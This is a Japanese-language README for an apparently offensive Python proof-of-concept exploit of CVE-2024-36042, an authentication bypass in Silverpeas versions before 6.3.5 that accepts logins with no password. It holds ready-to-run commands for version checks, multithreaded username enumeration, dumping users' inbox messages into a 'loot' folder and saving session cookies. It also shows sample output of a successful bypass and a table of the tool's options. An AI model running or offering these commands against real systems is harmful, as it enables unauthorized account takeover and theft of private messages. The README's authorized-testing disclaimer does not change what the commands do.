
Silverpeas < 6.3.5におけるCVE-2024-36042認証バイパス用のPython PoC。バージョン検出、マルチスレッドによるユーザー列挙、メッセージ抽出、および認可されたセキュリティテストのための構造化レポートを特徴としています。
洗練されたプロフェッショナルグレードのPython3概念実証 — Silverpeas < 6.3.5 において、
AuthenticationServletのパスワード検証欠如によって引き起こされる認証バイパス(CVE-2024-36042)を実証します。
Silverpeas の AuthenticationServlet は、POST 本文から Password パラメータが省略された場合でもログイン要求を受け入れ、既知のユーザー名に対して認証済みセッションへのアクセスを許可します。このツールは、モジュール式のマルチスレッドエクスプロイトフレームワークを通じて、高度な偵察、データ抽出、プロフェッショナルなレポート生成を備え、脆弱性を責任を持って実証します。
影響を受けるバージョン: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html
このツールは、ダンプされたメッセージに対して --message-output を介して4つの主要な出力モードをサポートしています。
console(デフォルト): クリーニングされたメッセージをキーワードハイライト付きで直接端末に出力します。markdown : 出力ディレクトリにアカウントごとに1つの {username}_messages.md レポートを生成します。files : アカウントごとにフォルダを作成し、各メッセージを個別ファイル(例: message_0006.md)として保存します。IDは0埋めされ、ファイルシステム上で整然とソートされます。both : console モードと markdown モードを組み合わせます。outdir/
├── SilverAdmin/
│ ├── message_0001.md
│ ├── message_0002.md
│ ├── raw/ (オプション: --save-raw-html)
│ │ └── msg_1.html
│ └── session_cookies.txt
├── scr1ptkiddy/
│ ├── messages.md
│ └── session_cookies.txt
└── summary.json
-t, --target SilverpeasのベースURL(必須)
-u, --user ターゲットとする単一のユーザー名
--userlist 1行に1ユーザー名のファイル
--dump-messages 受信トレイメッセージをスクレイピングして表示
--max-id チェックする最大メッセージID(デフォルト: 50)
--threads 同時実行ワーカー数(デフォルト: 5)
--proxy HTTPプロキシURL
--message-output 出力モード: {console, markdown, files, both}
--output-format ファイル形式: {md, txt}
--json 完全なJSONレポートをエクスポート
--csv スクレイピングしたメッセージのCSVをエクスポート
--outdir エクスポート先の出力ディレクトリ
--no-color ANSIカラー出力を無効化(ログ用に便利)
--save-raw-html デバッグ用に生のHTML応答を保存
--check-version バージョンのみを特定
--no-exploit エクスプロイトをスキップ(--check-versionと組み合わせて使用)
--quiet, -q 最小限の出力
--no-banner バナーを表示しない
[*] Target : http://10.49.169.44:8080
[*] Version : 6.3.1
[+] Version 6.3.1 < 6.3.5 - vulnerable.
[*] Trying: scr1ptkiddy
[+] BYPASSED -> scr1ptkiddy
[+] Data saved to ./scr1ptkiddy
────────────────────────────────────────────────────────────────────
Execution Summary
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Account │ Status │ Messages │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy │ SUCCESS │ 6 │
│ admin │ FAILED │ 0 │
└───────────────┴──────────┴──────────┘
[+] JSON report -> ./report_20260516_013210.json
このリポジトリは、私のオフェンシブセキュリティポートフォリオの一部です。以下のことを示しています。
このツールは、許可されたセキュリティテスト、研究、教育目的のみで提供されます。コンピュータシステムへの不正アクセスは違法です。自身が所有していないインフラストラクチャをテストする前に、必ず明示的な許可を得てください。
MIT
| 機能 | 説明 |
|---|
| バージョン検出 | 悪用前にSilverpeasのバージョンと脆弱性の状態を特定します。 |
| マルチスレッド | ThreadPoolExecutor による並行ユーザー列挙とスレッドセーフな出力。 |
| 高度な発見 | 多言語(英語/フランス語)対応のエンドポイント発見と複数IDプロービング。 |
| データ抽出 | 高忠実度のメッセージダンプ、重複除去、定型文フィルタリング。 |
| 柔軟な出力 | コンソール、Markdownレポート、個別ファイルエクスポート(.md または .txt)をサポート。 |
| プロキシ&デバッグ | Burp/ZAP経由のルーティング(--proxy)とパーサーデバッグ用の生HTML保存。 |
| クリーンなUX | ASCIIサマリーテーブル、キーワードハイライト、オプションのANSI色制御。 |